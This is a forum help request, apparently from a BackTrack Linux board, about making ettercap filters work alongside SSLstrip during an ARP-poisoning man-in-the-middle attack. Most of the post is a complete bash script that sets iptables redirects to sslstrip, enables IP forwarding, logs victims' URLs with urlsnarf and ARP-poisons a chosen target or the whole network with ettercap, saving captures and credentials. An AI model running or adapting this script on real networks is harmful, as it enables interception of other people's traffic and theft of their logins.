Hello,
I've googled for days and haven't found a simple answer to my issue. I am trying to get ettercap filters to work along with SSLstrip while doing an arp poisoning MITM attack. I am able to get filters to work fine without SSLstrip but once I enable SSLstrip the filters stop working. I believe this is because the PREROUTING command used in most tutorials and scripts sends everything to sslstrip before ettercap is done with the packets. I believe an OUTPUT rule defined by guid would take care of the problem. However, BT4 R1 doesn't include the ipt_owner module.
1) Is there an easy way to get the ipt_owner module working? I see a lot of posts telling people not to recompile.. and I've never done so before but I'm willing to play around since I have my USB persistent install cloned to another drive.
2) is there an alternate method of routing only traffic originating from ettercap to sslstrip?
I was thinking something along the lines of:
Code:
iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner ettercap --dport
80 -j REDIRECT --to-port 10000
to replace:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Am I approaching this correctly? Is there another way to do it?
Thanks for any advice and the great distro/resources here.
Here is the full script.
Code:
#!/bin/bash
# modified scripts found on backtrack-linux.org by killadninja, tedbear
# Make sure /etc/etter.conf is commented out as such
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
# Setup network
echo "[+] Setting up iptables"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
sleep 1
# Sslstrip
echo "[+] Starting sslstrip..."
#xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -a -k -w /root/$SESSION/$SESSION.log &
sleep 2
# urlsnarf
echo "[+] Starting urlsnarf..."
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
sleep 1
#arpspoof
#echo "[+] Starting arpspoof..."
#xterm -geometry 75x15+1+200 -T arpspoof -e arpspoof -i wlan0 -t 192.168.1.79 192.168.1.1 &
#xterm -geometry 75x15+1+200 -T arpspoof -e arpspoof -i wlan0 -t 192.168.1.1 192.168.1.79 &
# Ettercap
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -F ig.ef -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -P autoadd -M arp:remote /"$ROUTER"/ /"$VICTIM"/ &
cat /proc/sys/net/ipv4/ip_forward
iptables -t nat -L
#auto add hosts append -P autoadd
sleep 1
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close mitmssl and clean up properly by hitting y,
if mitmssl is not closed properly ERRORS WILL OCCUR "
read WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning mitmssl and resetting iptables..."
killall sslstrip
killall ettercap
killall python
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
echo "[+] Clean up successful..."
echo "[+] Thank you for using mitmssl Good Bye..."
exit
fi
exit
Routing ettercap traffic ipt_owner alternative?
Posting Permissions
